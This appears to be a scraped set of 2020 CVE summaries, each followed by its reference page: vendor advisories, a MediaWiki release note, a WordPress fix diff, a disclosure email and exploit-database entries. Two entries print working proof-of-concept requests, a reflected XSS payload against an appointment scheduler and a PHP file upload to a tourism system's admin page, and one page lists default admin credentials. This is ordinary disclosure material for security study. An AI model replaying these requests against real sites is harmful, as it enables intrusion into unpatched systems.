The Online Marriage Registration System 1.0 post parameter "searchdata" in the user/search.php request is vulnerable to Time Based Sql Injection.

**Online Marriage Registration System using PHP and MySQL**

  

**Online Marriage Registration System Inroduction**

Online Marriage Registration SystemO is a web-based technology that will manage the records of the marriage and generate marriage certificate. It’s an easy for Admin to retrieve the data of marriage couple. Online Marriage Registration System is an automatic system which delivers data processing in very high speed in systematic manner.

**Project Requirements**

**Project Name**

Online Marriage Registration System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In the Online Marriage Registration System, we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Dashboard**:  In this section, the admin can briefly view the total number of the new applications, total verified applications, and total rejected applications.

**2\. Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search applications with the help of the user registration number

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Dashboard**: In this section, user can view the welcome page of the web application.

**2\. Registration Form**: In this section, user can fill the form of marriage registration.

**3\. View Marriage Application:** In this section, user can take print of verified certificates of marriage.

Users can also update his profile, change their password, and recover their password.

****Some of the Project Screens****

**User Signup**

**Home Page**

**Marriage Certificate  
  
**

****How to run the Online Marriage Registration Project using PHP and MySQL****

1.Download the zip file

2.Extract the file and copy omrs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/Html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name omrsdb

6.Import omrsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/omrs

User Credential  
Username: 1234567890  
Password: Test@123

Admin Credential  
Username: admin  
Password: Test@123

****View Demo****

Download Full Source Code (Online Marriage Registration System Project)

Size: 10 MB

Version: V 1.0

**Project Report Link**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-35151: Online Marriage Registration System in PHP | Online Marriage Registration Project

MediaWiki before 1.35.1 allows XSS via BlockLogFormatter.php. MediaWiki:blanknamespace potentially can be output as raw HTML with SCRIPT tags via LogFormatter::makePageLink(). This affects MediaWiki 1.33.0 and later.

I would like to announce the release of MediaWiki 1.31.11 and 1.35.1! These releases also serve as a maintenance release for these branches. Numerous fixes have been backported into 1.35, including some for PHP 8.0 support (though we are not declaring full PHP 8.0 support yet). T268894 doesn't apply to MediaWiki 1.31, as the code was added in 1.35. Also, only one of the two fixes of T268938 apply to MediaWiki 1.31, as the code was not added until MediaWiki 1.33. While tarballs have already been uploaded, git tags will follow later on today. An "MediaWiki Extensions Security Release Supplement" email will follow this one. == Security fixes == \* (T268894, CVE-2020-35474) SECURITY: Message recentchanges-legend-watchlistexpiry can contain raw html. \* (T268917, CVE-2020-35475) SECURITY: Messages userrights-expiry-current and userrights-expiry-none can contain raw html. \* (T268938, CVE-2020-35478, CVE-2020-35479) SECURITY: BlockLogFormatter can output raw html. \* (T205908, CVE-2020-35477) SECURITY: Unable to change visibility of log entries when MediaWiki:Mainpage uses Special:MyLanguage. \* (T120883, CVE-2020-35480) SECURITY: Divergent behavior for contributions and user pages of hidden users and missing users. == Links to all mentioned tasks == \* https://phabricator.wikimedia.org/T268894 \* https://phabricator.wikimedia.org/T268917 \* https://phabricator.wikimedia.org/T268938 \* https://phabricator.wikimedia.org/T205908 \* https://phabricator.wikimedia.org/T120883 == Release notes == Full release notes for 1.31.11: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1\_31/RELEASE-NOTES… https://www.mediawiki.org/wiki/Release\_notes/1.31 Full release notes for 1.35.1: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1\_35/RELEASE-NOTES… https://www.mediawiki.org/wiki/Release\_notes/1.35 For information about how to upgrade, see <https://www.mediawiki.org/wiki/Manual:Upgrading> \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Download: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-core-1.31.11.tar.gz Patch to previous version (1.31.10): https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-core-1.31.11.tar.gz… https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Download: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.1.tar.gz Patch to previous version (1.35.0): https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.1.tar.gz.… https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html

CVE-2020-35478: [MediaWiki-announce] Security and maintenance release: 1.31.11 / 1.35.1 - MediaWiki-announce

Multiple cross-site scripting (XSS) vulnerabilities exist in PHPJabbers Appointment Scheduler 2.3, in the index.php admin login webpage (with different request parameters), allows remote attackers to inject arbitrary web script or HTML.

    # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)# Date: 2020-12-14# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.phpjabbers.com# Software Link: https://www.phpjabbers.com/appointment-scheduler# Version: 2.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)# CVE: CVE-2020-35416Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.PoC Request:GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1Host: [removed]Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36X-Requested-With: XMLHttpRequestSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://[removed]Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422PoC Response:HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Dec 2020 10:48:41 GMTContent-Type: text/html; charset=utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Origin, X-Requested-WithContent-Length: 13988<div class="container-fluid">   <div class="row">       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">           <div class="panel panel-default pjAsContainer pjAsAside">               <div class="panel-heading p...[SNIP]...<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>...[SNIP]...PoC Screenshots:https://imgrz.com/item/naqZhttps://imgrz.com/item/ngZ1orhttps://imagebin.ca/v/5kkKgOdFS9n5https://imagebin.ca/v/5kkKlhi4amhj

CVE-2020-35416: PHPJabbers Appointment Scheduler 2.3 Cross Site Scripting ≈ Packet Storm

The ultimate-category-excluder plugin before 1.2 for WordPress allows ultimate-category-excluder.php CSRF.

Timestamp:

12/08/2020 12:29:27 PM (20 months ago)

Marios Alexandrou

Message:

Addressed minor vulnerability reported by SCA AppSec.  

Location:

ultimate-category-excluder/trunk

Files:

  

*   readme.txt (1 diff)
*   ultimate-category-excluder.php (3 diffs)

**Legend:**

Unmodified

Added

Removed

*   **ultimate-category-excluder/trunk/readme.txt**
    
    r2364782
    
    r2434070
    
     
    
    32
    
    32
    
    33
    
    33
    
    \== Changelog ==
    
     
    
    34
    
     
    
    35
    
    \= 1.2 =
    
     
    
    36
    
    \* Addressed minor vulnerability reported by SCA AppSec. If concerned, review your UCE category settings to ensure they are set as expected.
    
    34
    
    37
    
    35
    
    38
    
    \= 1.1 =
    
*   **ultimate-category-excluder/trunk/ultimate-category-excluder.php**
    
    r1490271
    
    r2434070
    
     
    
    2
    
    2
    
    /\*
    
    3
    
    3
    
    Plugin Name: Ultimate Category Excluder
    
    4
    
     
    
    Version: 1.1
    
     
    
    4
    
    Version: 1.2
    
    5
    
    5
    
    Plugin URI: http://infolific.com/technology/software-worth-using/ultimate-category-excluder/
    
    6
    
    6
    
    Description: Easily exclude categories from your front page, feeds, archives, and search results.
    
    …
    
    …
    
     
    
    42
    
    42
    
    43
    
    43
    
    function ksuce\_options\_page() {
    
    44
    
     
    
        if( isset( $\_POST\[ 'ksuce' \] ) ) { $message = ksuce\_process(); }
    
     
    
    44
    
        if( isset( $\_POST\[ 'ksuce' \] ) ) {
    
     
    
    45
    
            check\_admin\_referer( 'uce\_form' );
    
     
    
    46
    
            $message = ksuce\_process();
    
     
    
    47
    
        }
    
    45
    
    48
    
        $options = ksuce\_get\_options();
    
    46
    
    49
    
        ?>
    
    …
    
    …
    
     
    
    50
    
    53
    
            <p><?php \_e( 'Use this page to select the categories you wish to exclude and where you would like to exclude them from.', 'UCE' ); ?></p>
    
    51
    
    54
    
            <form action="options-general.php?page=ultimate-category-excluder.php" method="post">
    
     
    
    55
    
            <?php wp\_nonce\_field( 'uce\_form' ); ?>
    
    52
    
    56
    
            <table class="widefat">
    
    53
    
    57
    
            <thead>
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2020-35135: Changeset 2434070 – WordPress Plugin Repository

SourceCodester Student Management System Project in PHP version 1.0 is vulnerable to stored a cross-site scripting (XSS) via the 'add subject' tab.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: krishna yadav <kisna1993yadav () gmail com>  
_Date_: Tue, 8 Dec 2020 10:07:53 +0530  

Dear Team,

Please find attached POC and detailed information for CVE-2020-25889 &
CVE-2020-25955.

For CVE-2020-25889:
# Exploit Title: online bus booking system project using PHP MySQL - SQL
Injection
# Exploit Author: Krishna Yadav
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10/Kali Linux

SQL Injection:
SQL Injection (SQLi) is a type of injection attack that makes it possible
to execute malicious SQL statements. These statements control a database
server behind a web application. Attackers can use SQL Injection
vulnerabilities to bypass application security measures. They can go around
authentication and authorization of a web page or web application and
retrieve the content of the entire SQL database. They can also use SQL
Injection to add, modify, and delete records in the database.

Attack Vector:
online-bus-booking-system-project-using-PHP-MySQL version 1.0 has SQL
injection at the login page. By placing SQL injection payload on the login
page attacker can bypass the authentication and can gain the admin
privilege.

Vulnerable Parameter: Login Page

==========================================================================================================================================

 For CVE-2020-25955
# Exploit Title: student management system project PHP - Stored cross-site
scripting
# Exploit Author: Krishna Yadav
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/14443/student-management-system-project-php.html
# Version: 1.0
# Tested on Windows 10/Kali Linux

Stored cross-site scripting:
Stored attacks are those where the injected script is permanently stored on
the target servers, such as in a database, in a message forum, visitor log,
comment field, etc. The victim then retrieves the malicious script from the
server when it requests the stored information. Stored XSS is also
sometimes referred to as Persistent or Type-I XSS.

Attack Vector:
student management system project version 1.0 is vulnerable to stored XSS.
Each time while editing the subjects XSS popup will reflect.

Vulnerable Parameter: Add subject tab is vulnerable to stored XSS.

NOTE: For better understanding, please look at the attached POCs for both
CVE IDs.

Kindly publish the details ASAP.

Thanks & Regards,
Krishna Yadav
Mob No. +91 8169434641

**Attachment: POC-for-CVE-2020-25889.mp4**  
_Description:_

**Attachment: POC for CVE-2020-25955.zip**  
_Description:_

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Request for full disclosure of CVE-2020-25889 & CVE-2020-25955** _krishna yadav (Dec 07)_

CVE-2020-25955: Request for full disclosure of CVE-2020-25889 & CVE-2020-25955

On Western Digital My Cloud OS 5 devices before 5.06.115, the NAS Admin dashboard has an authentication bypass vulnerability that could allow an unauthenticated user to execute privileged commands on the device.

**My Cloud OS 5 Firmware 5.06.115**

**WDC Tracking Number:** WDC-20009  
**Published:** November 23, 2020

**Last Updated:**  November 23, 2020

**Description**

My Cloud OS 5 was vulnerable to an authentication bypass vulnerability. My Cloud Firmware 5.06.115 contains updates to resolve this vulnerability and help improve the security of your My Cloud devices.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.06.115

November 19, 2020

My Cloud PR4100

5.06.115

November 19, 2020

My Cloud EX2 Ultra

5.06.115

November 19, 2020

My Cloud EX4100

5.06.115

November 19, 2020

My Cloud Mirror Gen 2

5.06.115

November 19, 2020

For more information on the latest security updates, see the release notes: https://os5releasenotes.mycloud.com/#/

**Advisory Summary**

Addressed a NAS Admin authentication bypass vulnerability that could allow an unauthenticated user to execute privileged commands on the device. The vulnerability was addressed through enhanced validation of URI paths.

**CVE Number:** CVE-2020-28940, CVE-2020-28971  
**Reported by:** Trapa Security working with Trend Micro’s Zero Day Initiative, & DEVCORE Security Team working with Trend Micro’s Zero Day Initiative

Hardened the operating system by removing an upload endpoint that could be used by an authenticated administrator to upload executable PHP scripts.

**CVE Number:** CVE-2020-28970  
**Reported by:** Sam Thomas (@\_s\_n\_t) of Pentest Ltd (@pentestltd) working with Trend Micro’s Zero Day Initiative

CVE-2020-28940: WDC-20009 OS 5 Firmware 5.06.115 | Western Digital

In cPanel before 90.0.17, 2FA can be bypassed via a brute-force approach (SEC-575).

CVE-2020-29136: 90 Change Log

An Arbitrary File Upload is discovered in SourceCodester Tourism Management System 1.0 allows the user to conduct remote code execution via admin/create-package.php vulnerable page.

    #Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload
    #Date: 2020-10-19
    #Exploit Author: Ankita Pal & Saurav Shukla
    #Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
    #Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
    #Version: V1.0
    #Tested on: Windows 10 + xampp v3.2.4
    
    
    Proof of Concept:::
    
    Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
    
    Step 2: Open Tour Package -> Create
    
    Malicious Request:::
    
    POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1
    Host: localhost:8081
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713
    Content-Length: 1101
    Origin: http://localhost:8081
    Connection: close
    Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
    Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
    Upgrade-Insecure-Requests: 1
    
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagename"
    
    Pack1
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagetype"
    
    Family
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagelocation"
    
    Manali
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packageprice"
    
    21
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagefeatures"
    
    Free
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagedetails"
    
    Details
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packageimage"; filename="file1.php"
    Content-Type: application/octet-stream
    
    <?php
    	phpinfo();
    ?>
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------63824304340061635682865592713--

CVE-2020-28136: OffSec’s Exploit Database Archive

Improper input validation in the Auto-Discovery component of Nagios XI before 5.7.5 allows an authenticated attacker to execute remote code.

CVE-2020-28648: Nagios XI Change Log - Nagios

A cross-site scripting (XSS) vulnerability exists in templates_import.php (Cacti 1.2.13) due to Improper escaping of error message during template import preview in the xml_path field

'CVE-2020-25706?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

Tag

#php